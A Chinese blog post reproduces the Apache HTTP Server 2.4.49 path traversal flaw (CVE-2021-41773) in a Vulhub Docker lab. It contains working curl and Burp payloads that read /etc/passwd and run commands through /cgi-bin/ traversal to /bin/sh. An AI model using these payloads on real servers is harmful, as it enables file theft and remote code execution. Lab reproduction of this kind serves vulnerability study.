【漏洞复现】Apache_HTTP_2.4.49_路径穿越漏洞(CVE-2021-41773)

过期的秋刀鱼-2023-11-07 2:37

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明 内容
漏洞编号 CVE-2021-41773
漏洞名称 Apache HTTP 路径穿越漏洞
漏洞评级 高危
影响范围 2.4.49
漏洞描述 在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件
修复方案

1.1、漏洞描述

Apache HTTP服务器项目致力于为现代操作系统(包括UNIX和Windows)开发和维护开源HTTP服务器。

在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置"要求全部拒绝"的保护,则这些请求可以成功。如果CGI脚本也为这些别名路径启用,则可以允许远程代码执行。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2021-41773

启动测试环境:

bash 复制代码 
sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到

2、漏洞验证
方式一 curl

/icons/必须是现有目录

bash 复制代码 
curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在服务器上启用mods cgicgid后,此路径遍历漏洞将允许执行任意命令

bash 复制代码 
curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
方式二 bp抓包
bash 复制代码 
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
bash 复制代码 
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id
相关推荐
“αβ”10 小时前
MySQL表的操作
linux·网络·数据库·c++·网络协议·mysql·https
Cher ~14 小时前
【协议】ICMP
网络·网络协议
丁丁丁梦涛15 小时前
EMQX配置 ssl 和 wss
网络·网络协议·ssl·emqx·wss
繁华似锦respect16 小时前
C++ unordered_map 底层实现与详细使用指南
linux·开发语言·c++·网络协议·设计模式·哈希算法·散列表
Wokoo716 小时前
HTTP不同版本核心对比
网络·网络协议·tcp/ip·http·udp·ssl
SelectDB17 小时前
Apache Doris 实时更新全解:从设计原理到最佳实践|Deep Dive
数据库·apache
乾元17 小时前
AI + Jinja2/Ansible:从自然语义到可执行 Playbook 的完整流水线(工程级深度)
运维·网络·人工智能·网络协议·华为·自动化·ansible
ZhengEnCi17 小时前
一次多线程同步问题的排查:从 thread_count 到 thread.join() 的踩坑之旅
python·网络协议·tcp/ip
oxygen-120418 小时前
https nginx步骤
网络协议·http·https
路由侠内网穿透.18 小时前
本地部署问答社区 Apache Anwser 并实现外部访问
服务器·windows·网络协议·apache·远程工作
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03UV安装并设置国内源04React CVE-2025-55182漏洞排查与修复指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06BongoCat - 跨平台键盘猫动画工具07本地部署阿里最新开源的Z-Image08Linux下V2Ray安装配置指南09智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践10Labelme从安装到标注:零基础完整指南